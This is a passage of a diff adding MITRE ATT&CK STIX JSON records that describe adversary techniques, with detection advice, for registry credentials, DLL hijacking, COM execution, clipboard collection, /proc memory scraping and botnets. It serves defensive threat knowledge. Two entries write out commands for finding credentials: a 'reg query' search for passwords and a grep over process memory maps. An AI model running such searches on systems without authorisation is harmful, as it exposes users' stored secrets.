"https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf" + }, + { + "source_name": "Unit 42 DarkHydrus July 2018", + "description": "Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus Targets Middle East Government. Retrieved August 2, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/" + }, + { + "source_name": "Microsoft Anti Spoofing", + "description": "Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.", + "url": "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide" + }, + { + "source_name": "Elastic - Koadiac Detection with EQL", + "description": "Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 30, 2020.", + "url": "https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Credentials in Registry", + "description": "The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.\n\nExample commands to find Registry keys related to password information: (Citation: Pentestlab Stored Credentials)\n\n* Local Machine Hive: reg query HKLM /f password /t REG_SZ /s\n* Current User Hive: reg query HKCU /f password /t REG_SZ /s", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Sudhanshu Chauhan, @Sudhanshu_C" + ], + "x_mitre_detection": "Monitor processes for applications that can be used to query the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "x_mitre_system_requirements": [ + "Ability to query some Registry locations depends on the adversary's level of access. User permissions are usually limited to access of user-related Registry keys." + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--2edd9d6a-5674-4326-a600-ba56de467286", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1214", + "external_id": "T1214" + }, + { + "source_name": "Pentestlab Stored Credentials", + "description": "netbiosX. (2017, April 19). Stored Credentials. Retrieved April 6, 2018.", + "url": "https://pentestlab.blog/2017/04/19/stored-credentials/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-16T12:26:49.584Z", + "name": "Stripped Payloads", + "description": "Adversaries may attempt to make a payload difficult to analyze by removing symbols, strings, and other human readable information. Scripts and executables may contain variables names and other strings that help developers document code functionality. Symbols are often created by an operating system’s `linker` when executable payloads are compiled. Reverse engineers use these symbols and strings to analyze code and to identify functionality in payloads.(Citation: Mandiant golang stripped binaries explanation)(Citation: intezer stripped binaries elf files 2018)\n\nAdversaries may use stripped payloads in order to make malware analysis more difficult. For example, compilers and other tools may provide features to remove or obfuscate strings and symbols. Adversaries have also used stripped payload formats, such as run-only AppleScripts, a compiled and stripped version of [AppleScript](https://attack.mitre.org/techniques/T1059/002), to evade detection and analysis. The lack of human-readable information may directly hinder detection and analysis of payloads.(Citation: SentinelLabs reversing run-only applescripts 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS", + "Linux", + "Windows", + "Network" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--2f41939b-54c3-41d6-8f8b-35f1ec18ed97", + "created": "2022-09-29T18:30:12.244Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1027/008", + "external_id": "T1027.008" + }, + { + "source_name": "intezer stripped binaries elf files 2018", + "description": "Ignacio Sanmillan. (2018, February 7). Executable and Linkable Format 101. Part 2: Symbols. Retrieved September 29, 2022.", + "url": "https://www.intezer.com/blog/malware-analysis/executable-linkable-format-101-part-2-symbols/" + }, + { + "source_name": "SentinelLabs reversing run-only applescripts 2021", + "description": "Phil Stokes. (2021, January 11). FADE DEAD | Adventures in Reversing Malicious Run-Only AppleScripts. Retrieved September 29, 2022.", + "url": "https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/" + }, + { + "source_name": "Mandiant golang stripped binaries explanation", + "description": "STEPHEN ECKELS. (2022, February 28). Ready, Set, Go — Golang Internals and Symbol Recovery. Retrieved September 29, 2022.", + "url": "https://www.mandiant.com/resources/blog/golang-internals-symbol-recovery" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Component Object Model", + "description": "Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)\n\nVarious COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).(Citation: Microsoft COM) Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1059/001), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)\n\nMonitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_remote_support": true, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64", + "created": "2020-02-12T14:09:53.107Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1559/001", + "external_id": "T1559.001" + }, + { + "source_name": "Fireeye Hunting COM June 2019", + "description": "Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June 10, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html" + }, + { + "source_name": "Microsoft COM", + "description": "Microsoft. (n.d.). Component Object Model (COM). Retrieved November 22, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx" + }, + { + "source_name": "ProjectZero File Write EoP Apr 2018", + "description": "Forshaw, J. (2018, April 18). Windows Exploitation Tricks: Exploiting Arbitrary File Writes for Local Elevation of Privilege. Retrieved May 3, 2018.", + "url": "https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html" + }, + { + "source_name": "Enigma Outlook DCOM Lateral Movement Nov 2017", + "description": "Nelson, M. (2017, November 16). Lateral Movement using Outlook's CreateObject Method and DotNetToJScript. Retrieved November 21, 2017.", + "url": "https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/" + }, + { + "source_name": "Enigma MMC20 COM Jan 2017", + "description": "Nelson, M. (2017, January 5). Lateral Movement using the MMC20 Application COM Object. Retrieved November 21, 2017.", + "url": "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:02.595Z", + "name": "Remote System Information Discovery", + "description": "An adversary may attempt to get detailed information about remote systems and their peripherals, such as make/model, role, and configuration. Adversaries may use information from Remote System Information Discovery to aid in targeting and shaping follow-on behaviors. For example, the system's operational role and model information can dictate whether it is a relevant target for the adversary's operational objectives. In addition, the system's configuration may be used to scope subsequent technique usage. \n\nRequests for system information are typically implemented using automation and management protocols and are often automatically requested by vendor software during normal operation. This information may be used to tailor management actions, such as program download and system or module firmware. An adversary may leverage this same information by issuing calls directly to the system's API.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Network Traffic: Network Traffic Content", + "File: File Access", + "Process: Process Creation" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "created": "2021-04-13T12:45:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0888", + "external_id": "T0888" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-28T15:51:58.945Z", + "name": "DLL Search Order Hijacking", + "description": "Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.\n\nThere are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)\n\nPhantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.\n\nAdversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)\n\nIf a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Travis Smith, Tripwire", + "Stefan Kanthak", + "Marina Liang", + "Ami Holeston, CrowdStrike", + "Will Alexander, CrowdStrike" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of `.manifest` and `.local` redirection files that do not correlate with software updates are suspicious.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34", + "created": "2020-03-13T18:11:08.357Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1574/001", + "external_id": "T1574.001" + }, + { + "source_name": "Adversaries Hijack DLLs", + "description": "CrowdStrike, Falcon OverWatch Team. (2022, December 30). Retrieved October 19, 2023.", + "url": "https://www.crowdstrike.com/blog/4-ways-adversaries-hijack-dlls/" + }, + { + "source_name": "FireEye Hijacking July 2010", + "description": "Harbour, N. (2010, July 15). Malware Persistence without the Windows Registry. Retrieved November 17, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2010/07/malware-persistence-windows-registry.html" + }, + { + "source_name": "FireEye fxsst June 2011", + "description": "Harbour, N. (2011, June 3). What the fxsst?. Retrieved November 17, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html" + }, + { + "source_name": "Microsoft Security Advisory 2269637", + "description": "Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved March 13, 2020.", + "url": "https://docs.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637" + }, + { + "source_name": "Microsoft Dynamic-Link Library Redirection", + "description": "Microsoft. (2018, May 31). Dynamic-Link Library Redirection. Retrieved March 13, 2020.", + "url": "https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection?redirectedfrom=MSDN" + }, + { + "source_name": "Microsoft Dynamic Link Library Search Order", + "description": "Microsoft. (2018, May 31). Dynamic-Link Library Search Order. Retrieved November 30, 2014.", + "url": "https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order?redirectedfrom=MSDN" + }, + { + "source_name": "Microsoft Manifests", + "description": "Microsoft. (n.d.). Manifests. Retrieved December 5, 2014.", + "url": "https://msdn.microsoft.com/en-US/library/aa375365" + }, + { + "source_name": "FireEye DLL Search Order Hijacking", + "description": "Nick Harbour. (2010, September 1). DLL Search Order Hijacking Revisited. Retrieved March 13, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2010/08/dll-search-order-hijacking-revisited.html" + }, + { + "source_name": "OWASP Binary Planting", + "description": "OWASP. (2013, January 30). Binary planting. Retrieved June 7, 2016.", + "url": "https://www.owasp.org/index.php/Binary_planting" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-01-02T13:35:57.680Z", + "name": "Automated Collection", + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. \n\nIn cloud-based environments, adversaries may also use cloud APIs, data pipelines, command line interfaces, or extract, transform, and load (ETL) services to automatically collect data.(Citation: Mandiant UNC3944 SMS Phishing 2023) \n\nThis functionality could also be built into remote access tools. \n\nThis technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files, as well as [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538) and [Cloud Storage Object Discovery](https://attack.mitre.org/techniques/T1619) to identify resources in cloud environments.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Praetorian" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Depending on the method used, actions could include common file system commands and parameters on the command-line interface within batch files or scripts. A sequence of actions like this may be unusual, depending on the system and network environment. Automated collection may occur along with other techniques such as [Data Staged](https://attack.mitre.org/techniques/T1074). As such, file access monitoring that shows an unusual process performing sequential file opens and potentially copy actions to another location on the file system for many files at once may indicate automated collection behavior. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), as well as through cloud APIs and command line interfaces.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "IaaS", + "SaaS" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_system_requirements": [ + "Permissions to access directories, files, and API endpoints that store information of interest." + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619", + "created": "2017-05-31T21:31:27.985Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1119", + "external_id": "T1119" + }, + { + "source_name": "Mandiant UNC3944 SMS Phishing 2023", + "description": "Mandiant Intelligence. (2023, September 14). Why Are You Texting Me? UNC3944 Leverages SMS Phishing Campaigns for SIM Swapping, Ransomware, Extortion, and Notoriety. Retrieved January 2, 2024.", + "url": "https://www.mandiant.com/resources/blog/unc3944-sms-phishing-sim-swapping-ransomware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:02.785Z", + "name": "Program Upload", + "description": "Adversaries may attempt to upload a program from a PLC to gather information about an industrial process. Uploading a program may allow them to acquire and study the underlying logic. Methods of program upload include vendor software, which enables the user to upload and read a program running on a PLC. This software can be used to upload the target program to a workstation, jump box, or an interfacing device.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow", + "Application Log: Application Log Content" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0845", + "external_id": "T0845" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-04-14T21:51:47.277Z", + "name": "Clipboard Data", + "description": "Adversaries may collect data stored in the clipboard from users copying information within or between applications. \n\nFor example, on Windows adversaries can access clipboard data by using clip.exe or Get-Clipboard.(Citation: MSDN Clipboard)(Citation: clip_win_server)(Citation: CISA_AA21_200B) Additionally, adversaries may monitor then replace users’ clipboard with their data (e.g., [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002)).(Citation: mining_ruby_reversinglabs)\n\nmacOS and Linux also have commands, such as pbpaste, to grab clipboard contents.(Citation: Operating with EmPyre)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f", + "created": "2017-05-31T21:31:25.967Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1115", + "external_id": "T1115" + }, + { + "source_name": "CISA_AA21_200B", + "description": "CISA. (2021, August 20). Alert (AA21-200B) Chinese State-Sponsored Cyber Operations: Observed TTPs. Retrieved June 21, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa21-200b" + }, + { + "source_name": "mining_ruby_reversinglabs", + "description": "Maljic, T. (2020, April 16). Mining for malicious Ruby gems. Retrieved October 15, 2022.", + "url": "https://blog.reversinglabs.com/blog/mining-for-malicious-ruby-gems" + }, + { + "source_name": "clip_win_server", + "description": "Microsoft, JasonGerend, et al. (2023, February 3). clip. Retrieved June 21, 2022.", + "url": "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/clip" + }, + { + "source_name": "MSDN Clipboard", + "description": "Microsoft. (n.d.). About the Clipboard. Retrieved March 29, 2016.", + "url": "https://msdn.microsoft.com/en-us/library/ms649012" + }, + { + "source_name": "Operating with EmPyre", + "description": "rvrsh3ll. (2016, May 18). Operating with EmPyre. Retrieved July 12, 2017.", + "url": "https://medium.com/rvrsh3ll/operating-with-empyre-ea764eda3363" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-10T16:41:01.496Z", + "name": "Proc Filesystem", + "description": "Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc//maps` file shows how memory is mapped within the process’s virtual address space. And `/proc//mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)\n\nWhen executing with root privileges, adversaries can search these memory locations for all processes on a system that contain patterns indicative of credentials. Adversaries may use regex patterns, such as grep -E \"^[0-9a-f-]* r\" /proc/\"$pid\"/maps | cut -d' ' -f 1, to look for fixed strings in memory structures or cached hashes.(Citation: atomic-red proc file system) When running without privileged access, processes can still view their own virtual memory locations. Some services or programs may save credentials in clear text inside the process’s memory.(Citation: MimiPenguin GitHub May 2017)(Citation: Polop Linux PrivEsc Gitbook)\n\nIf running as or with the permissions of a web browser, a process can search the `/maps` & `/mem` locations for common website credential patterns (that can also be used to find adjacent memory within the same structure) in which hashes or cleartext credentials may be located.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Tim (Wadhwa-)Brown" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "To obtain the passwords and hashes stored in memory, processes must open a maps file in the `/proc` filesystem for the process being analyzed. This file is stored under the path `/proc/PID/maps`, where the `PID` directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--3120b9fa-23b8-4500-ae73-09494f607b7d", + "created": "2020-02-11T18:46:24.434Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1003/007", + "external_id": "T1003.007" + }, + { + "source_name": "atomic-red proc file system", + "description": "Atomic Red Team. (2023, November). T1003.007 - OS Credential Dumping: Proc Filesystem. Retrieved March 28, 2024.", + "url": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md" + }, + { + "source_name": "baeldung Linux proc map 2022", + "description": "baeldung. (2022, April 8). Understanding the Linux /proc/id/maps File. Retrieved March 31, 2023.", + "url": "https://www.baeldung.com/linux/proc-id-maps" + }, + { + "source_name": "Polop Linux PrivEsc Gitbook", + "description": "Carlos Polop. (2023, March 5). Linux Privilege Escalation. Retrieved March 31, 2023.", + "url": "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#proc-usdpid-maps-and-proc-usdpid-mem" + }, + { + "source_name": "MimiPenguin GitHub May 2017", + "description": "Gregal, H. (2017, May 12). MimiPenguin. Retrieved December 5, 2017.", + "url": "https://github.com/huntergregal/mimipenguin" + }, + { + "source_name": "Picus Labs Proc cump 2022", + "description": "Huseyin Can YUCEEL & Picus Labs. (2022, March 22). Retrieved March 31, 2023.", + "url": "https://www.picussecurity.com/resource/the-mitre-attck-t1003-os-credential-dumping-technique-and-its-adversary-use" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Botnet", + "description": "Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).(Citation: Imperva DDoS for Hire)(Citation: Krebs-Anna)(Citation: Krebs-Bazaar)(Citation: Krebs-Booter)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during [Phishing](https://attack.mitre.org/techniques/T1566), [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499), or [Network Denial of Service](https://attack.mitre.org/techniques/T1498).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--31225cd3-cd46-4575-b287-c2c14011c074", + "created": "2020-10-01T00:49:05.467Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1583/005", + "external_id": "T1583.005" + }, + { + "source_name": "Norton Botnet", + "description": "Norton. (n.d.). What is a botnet?. Retrieved October 4, 2020.", + "url": "https://us.norton.com/internetsecurity-malware-what-is-a-botnet.html" + }, + { + "source_name": "Imperva DDoS for Hire", + "description": "Imperva. (n.d.). Booters, Stressers and DDoSers. Retrieved October 4, 2020.", + "url": "https://www.imperva.com/learn/ddos/booters-stressers-ddosers/" + }, + { + "source_name": "Krebs-Anna", + "description": "Brian Krebs. (2017, January 18). Who is Anna-Senpai, the Mirai Worm Author?. Retrieved May 15, 2017.", + "url": 